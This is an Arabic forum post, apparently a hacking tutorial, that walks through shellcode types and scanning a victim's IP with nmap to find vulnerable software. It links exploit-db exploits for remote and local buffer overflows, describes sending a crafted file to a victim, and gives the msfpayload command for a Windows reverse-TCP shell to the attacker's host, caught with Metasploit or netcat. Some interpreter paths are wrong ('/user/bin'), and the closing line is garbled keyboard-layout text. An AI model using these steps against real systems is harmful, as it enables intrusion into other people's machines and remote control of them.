كيفكم اخواني انشاء الله اموركم طيبة ونصركم الله على مافيه خير .؟!
باذن الله لو تقرا الموضوع كامل وتفهمة راح تفهك shellcode وكل شي عنه
وايضا معرفة البحث عن البرامج المركبة وانواع ثغراتها وكتابة shellcode
خاص فيك , والشرح على windows و backtrack4
اليوم معنا موضوع انشاء الله الجميع يستفيد منة :
1- تعريف shellcode ؟
2- فحص server او ip بــ Nmap ومعرفة البرامج المركبة عند الضحية + كيفة البحث عن ثغرات البرامج
4- ثغرات Remote Buffer OverFlow
5- ثغرات Local Buffer OverFlow
6- كتابة shellcode خاص فينا ؟
في البادية يجي للذهن ماهو shellcode ؟
هو عبارة عن رموز تستطيع خلق اتصال بينك وبين الضحية وتعطيك الصلاحية بالتحكم
بالضحية ويتخلف من بيئة لاخرى ( يعني بيئة اللينكس والوندوز ... الـخ ) والشرح راح يكون على النظامينqalpp
ايضا يعرف بكود برمجي صغير يستخدم كبايلود في الثغرات البرمجيه
طيب كيف تعرفة لمن تفتح الثغرة بكل بساطة في كلمات داله علية بالثغرة
مثل :
shellcode ,my $s h e l lc o d e زي كذا
طيب ياترى ماهي انواع shellcode
1- local shellcode
عبارة shellcode محلي يستخدم من قبل المهاجم وتكون صلاحيتة محدودة
ولكن (يحول صلاحيتة بثغرات البرامج لصلاحية روت انت تم التشغيل بشكل صحيح )
-remote shellcode
يستخدم من قبل المهاجم حيث يستغل اي نقطة ضعف في الـ process التي تكون الضحية
او اي جهاز معن في الشبكة خارجها في الانترنت
اذا نجح الاتصال بهذا shellcode في العادة يستخدم TCP/IP socket
طيب الي متعود يعمل shellcode خلال المشروع للميتاسبلويت تلاقي مثلا bindshell
ويش معنات هذا هذي لو انت تبي تسوي اتصال بينك وبين الضحية ياحلـو
وهنا تكمن التسمية bind اي خلال البورت
3- Download and execute shellcode
معروف ومشهور والاغلب يسمع فيه يجيك واحد يقول حصري على منتدنا اختراق
اختراق بالميتاسبلويت وارفع باتش بيفروست !
يعني المقصود حبايبي يعني تحميل وتشغيل shellcode هذا بابسط صورة
4- Staged
هذا يقول لك لمن يسوي install يعني يسوي لود للبانات فتوصل لاقصى حد لها
هنا بالامكان حقن الـ porocess , ومن ثم الاستغلال لصالحك
5- Egg-hunt shellcode
وهذا يبحث عن عنوان العمليات وله مساحة وحجم اقل من shellcode
6-Omelet shellcode
يستخدم لحقن عنوان صغير جدا داخل احد العمليات process
ثغرات Remote Buffer OverFlow :
الاختراق عن طريق احد البرامج المصابة المركبة عند الضحية او في سيرفر معين ,
ويتم الاختراق عن طريق ip مباشرة انما هنالك شروط لهذه الثغرة
وهنا تكمن خطورة الثغرة لذلك لابد من توفر شروط
1- توفر وجود البرنامج عند الضحية او السيرفر وتوافق الاصدار او لاترقع الثغرة
2- عمل shellcode المناسب
3- بعضها تحتاج لمفسر الباثيون , البيرل , الروبي لابد من توفرها .
على سبيل المثـال :
كود PHP:
http://www.exploit-db.com/exploits/16101/
طريقة الاستخدام بالشكل التـالي :
ثغرات Local Buffer OverFlow :
ثغرات ومن الاسم تعرف انها محلية يعني , تخترق بصيغة البرنامج المصاب مثل لو عندي
ثغرة لبرنامج الريل بلاير ؟ اترجم الثغرة واجهز شيل كود صحيح تنشى لي ملف
بنفس صيغة البرنامج المصاب كل الي عليك ترسلة للضحيـة
على سبيل المثـال :
كود PHP:
http://www.exploit-db.com/exploits/16072/
طريقة الاستخدام بالشكل التـالي :
طيب بعد الانتهاء من انشاء shellcode وهذا ماسوف نتطرق اليه في اخر خطوة بالامكان التنصت
بالميتاسبلويت بعد ارسال الملف او النت كات كما يوضح امامكم
تنوية مهـم جـدا :
الثغرات زي متلاحظون مكتوبة بالبيرل , الروبي الباثيون , السي طيب بالنسبة لمستخدمي الوندوز
وللمعلومية جميعها للغات برمجية
راح اعطيهم الراوبط للمفسرات في نهاية الموضوع وكيف تعرف انها باي لغة مكتوبة زي ماشرحنا على
الصور وراح نكرر العملــية عشان الموضوع مفهوم من مجاميعة
كود PHP:
#!/user/bin/ruby للغة الروبي
كود PHP:
#!/user/bin/python للغة الباثيون
كود PHP:
#!/user/bin/perl للغة البيرل
كود PHP:
#!/user/bin/php للغة البي اتش بي
كود PHP:
#include<iostream.h> هذه للغة السي ++
طيب بالنسبة للـينكس مثلا الـ Backtrack 4
ماتجتاج زي ماهو موضح امامكم
افتح مستند وانسخ الثغرة :
فحص server او ip بــ Nmap ومعرفة البرامج المركبة عند الضحية + كيفة البحث عن ثغرات البرامج :
احنا راح نتطرق للفحص بـ Nmap فقط ولكن تقدر تفحص بالميتاسبلويت وnikto2
او اي اداة موجود في Backtrack 4 مليان ادوات فحص
الـ Nmap :
اداة معروفة ومشهورة وجدي يعرفها للفحص السيرفر والايبي ادرس والشبكات
ومعرفة البرامج المركبة وخدماتها والمنافذ (البورتات المفتوحة ) وهي موجودة في
Backtack 4 وملستخدمي الوندوز هذا الرابط الرسمـي للموقع
[php] nmap -sV IP victim or server الضحية او السيرفر المراد فحصة [php]
الان كيف تبحث عن ثغرات البرامج :
في البداية نذهب لهـذا الموقع
كود PHP:
http://www.exploit-db.com
الان انشـاء shellcode خاص فينا ؟ بالمناسبة هنا تصير مشاكل كثير :
يعني واحد مايدري انواع shellcode واي واحد مناسب له ؟ مع انه الثغرة هي
التي تقيدك بـ shellcode المناسب على سبيل المثال هذه الثغرة :
كود PHP:
http://www.exploit-db.com/exploits/5563/
طيب زي ماهو موضح عندك محدد نوع shellcode في الثغرة والي لازم انك تعمل لك
واحد خاص فيك ؟ وانت تروح تفرفر وتتفلسف وتقول اسوي shellcode metepreter
كود PHP:
my $shellcode =
# windows/shell_bind_tcp - 500 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
طيب مثلا انا لو اريد اعمل shellcode
كود PHP:
windows/shell/reverse_tcp
طيب اولا التطبيق على windows وبعدها على backtrack 4
وانتهى ولان ننسخة في الثغرة تبعنا
طيب بالنسبة للـ Backtrack4
كود PHP:
cd /opt/metasploit3/msf3/
كود PHP:
msfpayload windows/shell/reverse_tcp LHOST= IP LPORT = PORT
الحمد لله انتهى والان نعطيكم برامج مترجمات الثغرات على الوندوز من المواقع الرسمية :
كود PHP:
Active Perl
http://www.activestate.com/activeperl/downloads
ActivePython
http://www.activestate.com/activepython/downloads
C & C++
http://www.cygwin.com/setup
Ruby
http://rubyforge.org/frs/download.ph...186-27_rc2
PhP
http://sourceforge.net/projects/appserv/
اذا الموضوع يستاهل نريد تقيمكم والي الموضوع مايعجبة يرد عادي ويقول راية
اتمنى ان الموضوع واضح وبسيط يالله اشوفكم على خير ســلام
juvdt shellcode + hkahx ag ohw td; ,hojvhr